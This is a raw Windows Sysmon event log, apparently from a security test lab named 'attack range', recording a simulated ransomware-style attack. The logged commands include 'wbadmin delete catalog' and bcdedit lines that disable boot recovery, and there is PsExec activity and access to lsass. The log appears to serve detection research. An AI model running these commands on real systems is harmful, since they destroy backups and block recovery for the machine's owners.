10:56:42.398{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4176C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.398{C8EA50B7-12EA-6216-5A05-000000003802}5172844C:\Windows\system32\cmd.exe{00000000-0000-0000-0000-000000000000}4176C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.399{C8EA50B7-12EA-6216-5C05-000000003802}4176C:\Windows\System32\bcdedit.exe10.0.14393.4770 (rs1_release.211101-1440)Boot Configuration Data EditorMicrosoft® Windows® Operating SystemMicrosoft Corporationbcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=5639B10AF2E2A56F54A63A7BF1553EED,SHA256=999C9F92E914F69E278FD684E5DB5AECD16A01C324DF2FF351BCF041E3B4019A,IMPHASH=640CFCF7F00029D52EF0C4D45E2E87A6{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no 10341000x8000000000000000290230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.398{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}4176C:\Windows\system32\bcdedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.367{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5B05-000000003802}340C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.367{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5B05-000000003802}340C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.345{C8EA50B7-12EA-6216-5B05-000000003802}3405828C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5B05-000000003802}340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5B05-000000003802}340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.314{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.298{C8EA50B7-12E9-6216-4E05-000000003802}68686944C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+10af|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+178a|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+193c|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.311{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe" 10341000x8000000000000000290217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.298{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5A05-000000003802}5172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.267{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5905-000000003802}4704C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.267{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5905-000000003802}4704C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.264{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.264{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.245{C8EA50B7-12EA-6216-5905-000000003802}47041120C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5805-000000003802}2860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:42.245{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000290210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.214{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-5905-000000003802}4704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.214{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-5905-000000003802}4704C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.214{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5705-000000003802}5208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.214{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-5705-000000003802}5208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.198{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.198{C8EA50B7-12E9-6216-4E05-000000003802}68686944C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe{00000000-0000-0000-0000-000000000000}2860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+10af|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+1779|C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe+193c|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.210{C8EA50B7-12EA-6216-5805-000000003802}2860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quietC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe"C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe" 10341000x8000000000000000290203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.198{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{00000000-0000-0000-0000-000000000000}2860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 924900x8000000000000000290202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.183{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe\Device\HarddiskVolume1 10341000x8000000000000000290201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.183{C8EA50B7-12EA-6216-5705-000000003802}52085448C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 924900x8000000000000000290200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.183{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe\Device\HarddiskVolume1 924900x8000000000000000290199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.183{C8EA50B7-12EA-6216-5605-000000003802}5232C:\Windows\System32\svchost.exe\Device\HarddiskVolume1 10341000x8000000000000000290198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.167{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 